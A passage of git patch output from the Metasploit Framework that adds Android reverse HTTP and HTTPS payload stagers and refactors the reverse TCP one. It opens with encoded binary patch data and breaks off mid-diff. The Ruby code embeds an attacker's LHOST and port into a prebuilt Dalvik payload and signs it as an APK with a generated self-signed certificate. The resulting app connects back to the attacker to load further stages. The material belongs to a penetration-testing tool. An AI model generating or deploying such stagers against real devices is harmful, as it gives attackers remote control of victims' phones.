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 diff --git a/data/android/metstage.jar b/data/android/metstage.jar index 095c7b9a64a328b35850cdffccaaae6fcd8dca33..1271994fbab34694c10605904afaff08038b88f0 100644 GIT binary patch delta 45 ucmdnZx0{bQz?+#xgn@&DgF$0j) From dc8992924fc192bdc02f8295a9bd5bebcc566856 Mon Sep 17 00:00:00 2001 From: AnwarMohamed Date: Wed, 26 Feb 2014 02:18:42 +0200 Subject: [PATCH 050/853] android reverse_http/s --- .../payloads/stagers/android/reverse_http.rb | 88 +++++++++++++++++ .../payloads/stagers/android/reverse_https.rb | 94 +++++++++++++++++++ .../payloads/stagers/android/reverse_tcp.rb | 6 ++ 3 files changed, 188 insertions(+) create mode 100644 modules/payloads/stagers/android/reverse_http.rb create mode 100644 modules/payloads/stagers/android/reverse_https.rb diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb new file mode 100644 index 0000000000..182acd498d --- /dev/null +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -0,0 +1,88 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_http' + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Dalvik + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Dalvik Reverse HTTP Stager', + 'Description' => 'Tunnel communication over HTTP', + 'Author' => 'anwarelmakrahy', + 'License' => MSF_LICENSE, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'Handler' => Msf::Handler::ReverseHttp, + 'Stager' => {'Payload' => ""} + )) + + register_options( + [ + OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) + ], self.class) + end + + def string_sub(data, placeholder, input) + data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) + end + + def generate_jar(opts={}) + jar = Rex::Zip::Jar.new + + classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) + + string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST'] + string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] + jar.add_file("classes.dex", fix_dex_header(classes)) + + files = [ + [ "AndroidManifest.xml" ], + [ "res", "drawable-mdpi", "icon.png" ], + [ "res", "layout", "main.xml" ], + [ "resources.arsc" ] + ] + + jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk")) + jar.build_manifest + + x509_name = OpenSSL::X509::Name.parse( + "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" + ) + key = OpenSSL::PKey::RSA.new(1024) + cert = OpenSSL::X509::Certificate.new + cert.version = 2 + cert.serial = 1 + cert.subject = x509_name + cert.issuer = x509_name + cert.public_key = key.public_key + + # Some time within the last 3 years + cert.not_before = Time.now - rand(3600*24*365*3) + + # From http://developer.android.com/tools/publishing/app-signing.html + # """ + # A validity period of more than 25 years is recommended. + # + # If you plan to publish your application(s) on Google Play, note + # that a validity period ending after 22 October 2033 is a + # requirement. You can not upload an application if it is signed + # with a key whose validity expires before that date. + # """ + cert.not_after = cert.not_before + 3600*24*365*20 # 20 years + + jar.sign(key, cert, [cert]) + + jar + end + +end \ No newline at end of file diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb new file mode 100644 index 0000000000..cab35f9380 --- /dev/null +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -0,0 +1,94 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +# + +require 'msf/core' +require 'msf/core/handler/reverse_https' + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Dalvik + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Dalvik Reverse HTTPS Stager', + 'Description' => 'Tunnel communication over HTTPS', + 'Author' => 'anwarelmakrahy', + 'License' => MSF_LICENSE, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'Handler' => Msf::Handler::ReverseHttps, + 'Stager' => {'Payload' => ""} + )) + + @class_files = [ + [ "metasploit", "PayloadTrustManager.class" ], + ] + + register_options( + [ + OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) + ], self.class) + + end + + def string_sub(data, placeholder, input) + data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) + end + + def generate_jar(opts={}) + jar = Rex::Zip::Jar.new + + classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) + + string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + datastore['LHOST'].to_s) if datastore['LHOST'] + string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] + jar.add_file("classes.dex", fix_dex_header(classes)) + + files = [ + [ "AndroidManifest.xml" ], + [ "res", "drawable-mdpi", "icon.png" ], + [ "res", "layout", "main.xml" ], + [ "resources.arsc" ] + ] + + jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk")) + jar.build_manifest + + x509_name = OpenSSL::X509::Name.parse( + "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" + ) + key = OpenSSL::PKey::RSA.new(1024) + cert = OpenSSL::X509::Certificate.new + cert.version = 2 + cert.serial = 1 + cert.subject = x509_name + cert.issuer = x509_name + cert.public_key = key.public_key + + # Some time within the last 3 years + cert.not_before = Time.now - rand(3600*24*365*3) + + # From http://developer.android.com/tools/publishing/app-signing.html + # """ + # A validity period of more than 25 years is recommended. + # + # If you plan to publish your application(s) on Google Play, note + # that a validity period ending after 22 October 2033 is a + # requirement. You can not upload an application if it is signed + # with a key whose validity expires before that date. + # """ + cert.not_after = cert.not_before + 3600*24*365*20 # 20 years + + jar.sign(key, cert, [cert]) + + jar + end + +end diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index d41922f40e..005380bad3 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -24,6 +24,11 @@ module Metasploit3 'Handler' => Msf::Handler::ReverseTcp, 'Stager' => {'Payload' => ""} )) + + register_options( + [ + OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) + ], self.class) end def string_sub(data, placeholder, input) @@ -37,6 +42,7 @@ module Metasploit3 string_sub(classes, '127.0.0.1 ', datastore['LHOST'].to_s) if datastore['LHOST'] string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] jar.add_file("classes.dex", fix_dex_header(classes)) files = [ From 99cc94e6fc878f98e4932037aedc48842717d3ec Mon Sep 17 00:00:00 2001 From: AnwarMohamed Date: Mon, 3 Mar 2014 06:54:56 +0200 Subject: [PATCH 051/853] moving string_sub() to payload/dalvik.rb --- lib/msf/core/payload/dalvik.rb | 4 ++++ modules/payloads/stagers/android/reverse_http.rb | 7 +++---- modules/payloads/stagers/android/reverse_https.rb | 7 +++---- modules/payloads/stagers/android/reverse_tcp.rb | 4 ---- 4 files changed, 10 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb index aeae5aa361..6c78e2802c 100644 --- a/lib/msf/core/payload/dalvik.rb +++ b/lib/msf/core/payload/dalvik.rb @@ -31,5 +31,9 @@ module Msf::Payload::Dalvik [str.length].pack("N") + str end + def string_sub(data, placeholder="", input="") + data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) + end + end diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index 182acd498d..b9de3d5242 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -31,11 +31,10 @@ module Metasploit3 ], self.class) end - def string_sub(data, placeholder, input) - data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) - end - def generate_jar(opts={}) + u = datastore['LHOST'] ? datastore['LHOST'] : String.new + raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32 + jar = Rex::Zip::Jar.new classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index cab35f9380..c2f81cf6bc 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -37,11 +37,10 @@ module Metasploit3 end - def string_sub(data, placeholder, input) - data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) - end - def generate_jar(opts={}) + u = datastore['LHOST'] ? datastore['LHOST'] : String.new + raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32 + jar = Rex::Zip::Jar.new classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index 005380bad3..53cb086783 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -31,10 +31,6 @@ module Metasploit3 ], self.class) end - def string_sub(data, placeholder, input) - data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) - end - def generate_jar(opts={}) jar = Rex::Zip::Jar.new From b45524ecddbcf37bb7e497bc18ee06b5452985a6 Mon Sep 17 00:00:00 2001 From: AnwarMohamed Date: Tue, 4 Mar 2014 05:54:31 +0200 Subject: [PATCH 052/853] generate cert @ payload/dalvik.rb --- lib/msf/core/payload/dalvik.rb | 27 +++++++++++++++++ .../payloads/stagers/android/reverse_http.rb | 26 +---------------- .../payloads/stagers/android/reverse_https.rb | 29 +------------------ .../payloads/stagers/android/reverse_tcp.rb | 27 +---------------- 4 files changed, 30 insertions(+), 79 deletions(-) diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb index 6c78e2802c..66c0345f2b 100644 --- a/lib/msf/core/payload/dalvik.rb +++ b/lib/msf/core/payload/dalvik.rb @@ -35,5 +35,32 @@ module Msf::Payload::Dalvik data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) end + def generate_cert + x509_name = OpenSSL::X509::Name.parse( + "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" + ) + key = OpenSSL::PKey::RSA.new(1024) + cert = OpenSSL::X509::Certificate.new + cert.version = 2 + cert.serial = 1 + cert.subject = x509_name + cert.issuer = x509_name + cert.public_key = key.public_key + + # Some time within the last 3 years + cert.not_before = Time.now - rand(3600*24*365*3) + + # From http://developer.android.com/tools/publishing/app-signing.html + # """ + # A validity period of more than 25 years is recommended. + # + # If you plan to publish your application(s) on Google Play, note + # that a validity period ending after 22 October 2033 is a + # requirement. You can not upload an application if it is signed + # with a key whose validity expires before that date. + # """ + cert.not_after = cert.not_before + 3600*24*365*20 # 20 years + return cert, key + end end diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index b9de3d5242..edfc65f548 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -54,31 +54,7 @@ module Metasploit3 jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk")) jar.build_manifest - x509_name = OpenSSL::X509::Name.parse( - "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" - ) - key = OpenSSL::PKey::RSA.new(1024) - cert = OpenSSL::X509::Certificate.new - cert.version = 2 - cert.serial = 1 - cert.subject = x509_name - cert.issuer = x509_name - cert.public_key = key.public_key - - # Some time within the last 3 years - cert.not_before = Time.now - rand(3600*24*365*3) - - # From http://developer.android.com/tools/publishing/app-signing.html - # """ - # A validity period of more than 25 years is recommended. - # - # If you plan to publish your application(s) on Google Play, note - # that a validity period ending after 22 October 2033 is a - # requirement. You can not upload an application if it is signed - # with a key whose validity expires before that date. - # """ - cert.not_after = cert.not_before + 3600*24*365*20 # 20 years - + cert, key = generate_cert jar.sign(key, cert, [cert]) jar diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index c2f81cf6bc..6a50fa544b 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -25,9 +25,6 @@ module Metasploit3 'Handler' => Msf::Handler::ReverseHttps, 'Stager' => {'Payload' => ""} )) - - @class_files = [ - [ "metasploit", "PayloadTrustManager.class" ], ] register_options( @@ -60,31 +57,7 @@ module Metasploit3 jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk")) jar.build_manifest - x509_name = OpenSSL::X509::Name.parse( - "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" - ) - key = OpenSSL::PKey::RSA.new(1024) - cert = OpenSSL::X509::Certificate.new - cert.version = 2 - cert.serial = 1 - cert.subject = x509_name - cert.issuer = x509_name - cert.public_key = key.public_key - - # Some time within the last 3 years - cert.not_before = Time.now - rand(3600*24*365*3) - - # From http://developer.android.com/tools/publishing/app-signing.html - # """ - # A validity period of more than 25 years is recommended. - # - # If you plan to publish your application(s) on Google Play, note - # that a validity period ending after 22 October 2033 is a - # requirement. You can not upload an application if it is signed - # with a key whose validity expires before that date. - # """ - cert.not_after = cert.not_before + 3600*24*365*20 # 20 years - + cert, key = generate_cert jar.sign(key, cert, [cert]) jar diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index 53cb086783..a6adcc1f77 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -51,32 +51,7 @@ module Metasploit3 jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk")) jar.build_manifest - x509_name = OpenSSL::X509::Name.parse( - "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" - ) - key = OpenSSL::PKey::RSA.new(1024) - cert = OpenSSL::X509::Certificate.new - cert.version = 2 - cert.serial = 1 - cert.subject = x509_name - cert.issuer = x509_name - cert.public_key = key.public_key - - # Some time within the last 3 years - cert.not_before = Time.now - rand(3600*24*365*3) - - # From http://developer.android.com/tools/publishing/app-signing.html - # """ - # A validity period of more than 25 years is recommended. - # - # If you plan to publish your application(s) on Google Play, note - # that a validity period ending after 22 October 2033 is a - # requirement. You can not upload an application if it is signed - # with a key whose validity expires before that date. - # """ - # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC - cert.not_after = Time.at( 0x78045d81 + rand( 0x7fffffff - 0x78045d81 )) - + cert, key = generate_cert jar.sign(key, cert, [cert]) jar From ad8b0ef3d1a80c0437f16eb8194546f5da93cf2d Mon Sep 17 00:00:00 2001 From: AnwarMohamed Date: Thu, 6 Mar 2014 20:33:08 +0200 Subject: [PATCH 053/853] using http(s)://LHOST:LPORT --- modules/payloads/stagers/android/reverse_http.rb | 11 +++++------ modules/payloads/stagers/android/reverse_https.rb | 10 ++++------ 2 files changed, 9 insertions(+), 12 deletions(-) diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index edfc65f548..cafd8af906 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ 